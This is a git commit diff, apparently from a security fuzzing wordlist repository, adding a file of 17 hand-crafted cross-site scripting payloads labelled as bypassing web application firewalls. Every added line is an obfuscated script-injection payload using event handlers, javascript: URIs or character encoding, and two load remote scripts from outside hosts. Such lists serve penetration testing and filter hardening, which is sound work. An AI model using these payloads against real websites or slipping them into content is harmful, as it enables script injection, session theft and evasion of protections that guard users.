Merge pull request #224 from s0md3v/patch-1

Hand crafted XSS payloads to bypass WAFs Source: https://github.com/s0md3v/AwesomeXSS
2018-10-15 11:43:19 +01:00
parent 11bea7627e cebebee4b5
commit 7efce4c385
1 changed files with 17 additions and 0 deletions
--- a/Fuzzing/XSS-Somdev.txt
+++ b/Fuzzing/XSS-Somdev.txt
@@ -0,0 +1,17 @@
+<svg%0Aonload=%09((pro\u006dpt))()//
+<sCript x>(((confirm)))``</scRipt x>
+<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
+<details open ontoggle=confirm()>
+<script y="><">/*<script* */prompt()</script
+<a href="javascript%26colon;alert(1)">click
+<svg onload=write()>
+<a href=javas&#99;ript:alert(1)>click
+<script/"<a"/src=data:=".<a,[8].some(confirm)>
+<svg/x=">"/onload=confirm()//
+<--`<img/src=` onerror=confirm``> --!>
+<svg </onload ="1> (_=prompt,_(1)) "">
+<!--><script src=//14.rs>
+<script x=">" src=//15.rs></script>
+<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
+<x oncut=alert()>x
+<iframe/src \/\/onload = prompt(1)